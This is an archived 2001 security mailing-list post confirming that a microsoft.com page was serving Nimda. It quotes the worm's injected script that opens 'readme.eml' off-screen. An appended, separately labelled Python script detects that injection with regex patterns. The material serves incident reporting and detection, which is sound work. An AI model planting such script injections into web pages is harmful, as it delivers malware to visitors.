Security Incidents mailing list archives

Re: Please tell me I'm wrong: microsoft.com infected


From: "Jay D. Dyson" <jdyson () treachery net>
Date: Wed, 19 Sep 2001 15:02:43 -0700 (PDT)

-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 19 Sep 2001, Steve Cody wrote:

> I just went to http://www.microsoft.com/frontpage, and my Symantec
> Norton Antivirus popped up and denied access to readme.eml.
>
> I could not view the source of the loaded page, so I can't verify that
> it is definitely infected.

        Your worst fears have now been confirmed.

sasumata$ telnet www.microsoft.com 80
Trying 207.46.197.100...
Connected to www.microsoft.akadns.net.
Escape character is '^]'.
GET /frontpage/ HTTP/1.0

<snip>

<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>

        Microsoft's site has been compromised by Nimda.  There is no
disputing it now.

- -Jay

  (    (                                                          _______
  ))   ))   .--"There's always time for a good cup of coffee"--.   >====<--.
C|~~|C|~~| (>------ Jay D. Dyson -- jdyson () treachery net ------<) |    = |-'
 `--' `--'  `-- What doesn't kill us only makes us stronger. --'  `------'

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: See http://www.treachery.net/~jdyson/ for current keys.

iQCVAwUBO6kH9rlDRyqRQ2a9AQESugP8C6RIIUmkcV/e6ifRNqz067ER5PSizDDA
APzdpR1DO1Q9N5lMEtUagEshgDSYiGKUBU+5vesKZ7TWCjad4iuY8ME0oe4yZxjv
acSX3Tqo0b+sQtJ5VF1IYSljqSbZ+EvYYDUUF8PEmQdkyCp2u/J8HX+duykaisvc
5CjLcnLK5U8=
=DIF4
-----END PGP SIGNATURE-----


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
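As an added example (not part of the original post, and not a tool Jay or the list used), the following Python script does by hand what the telnet session above does by eye: it splits a raw HTTP/1.0 response into status line, headers and body, and then looks in an HTML body for the Nimda page modification, a script block that calls window.open on readme.eml in an off-screen window. The sample responses below are constructed; only the script line is taken from the message, and the header lines are assumed.

```python
import re

# Indicators derived from the response body quoted in the message.
# The readme.eml window.open call is the strong indicator; the other two
# are supporting evidence only (an .eml reference inside any <script>, and
# a window shoved far off-screen such as "top=6000,left=6000").
NIMDA_OPEN_RE = re.compile(
    r'window\.open\(\s*["\']readme\.eml["\']', re.IGNORECASE)
SCRIPT_EML_RE = re.compile(
    r'<script[^>]*>.*?\.eml.*?</script>', re.IGNORECASE | re.DOTALL)
OFFSCREEN_RE = re.compile(r'\b(?:top|left)\s*=\s*\d{4,}', re.IGNORECASE)


def split_http_response(raw):
    """Split a raw HTTP/1.0 response, as captured over telnet, into
    (status_line, headers_dict, body). Header names are lower-cased."""
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:  # tolerate transcripts that were saved with bare LF
        head, sep, body = raw.partition("\n\n")
    lines = head.splitlines()
    status = lines[0] if lines else ""
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if colon:
            headers[name.strip().lower()] = value.strip()
    return status, headers, body


def scan_html(body):
    """Return the list of indicator names present in an HTML body.
    'nimda_readme_eml' alone is worth acting on; the others are context."""
    hits = []
    if NIMDA_OPEN_RE.search(body):
        hits.append("nimda_readme_eml")
    if SCRIPT_EML_RE.search(body):
        hits.append("script_references_eml")
    if OFFSCREEN_RE.search(body):
        hits.append("offscreen_window")
    return hits


def check_response(raw):
    """Scan one raw response. Only HTML bodies are inspected, judged by the
    Content-Type header or, failing that, by the body starting with <html."""
    status, headers, body = split_http_response(raw)
    ctype = headers.get("content-type", "")
    looks_like_html = "text/html" in ctype or body.lstrip().lower().startswith("<html")
    if not looks_like_html:
        return {"status": status, "indicators": []}
    return {"status": status, "indicators": scan_html(body)}


# Constructed sample: the status and header lines are assumed, the script
# line is the one quoted from the www.microsoft.com telnet session.
INFECTED_RESPONSE = (
    "HTTP/1.0 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><script language=\"JavaScript\">window.open(\"readme.eml\", null,\n"
    "\"resizable=no,top=6000,left=6000\")</script></html>\n"
)

# Constructed clean page for comparison.
CLEAN_RESPONSE = (
    "HTTP/1.0 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body><p>Nothing to see here.</p></body></html>\n"
)

if __name__ == "__main__":
    for label, raw in (("infected", INFECTED_RESPONSE), ("clean", CLEAN_RESPONSE)):
        print(label, check_response(raw))
```

To run this against a live server the way Jay did, feed check_response the bytes returned for a plain `GET /path/ HTTP/1.0` request (decoded as text); the point of splitting headers from body first is that a 302 or a non-HTML Content-Type should not be scanned as if it were the page.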

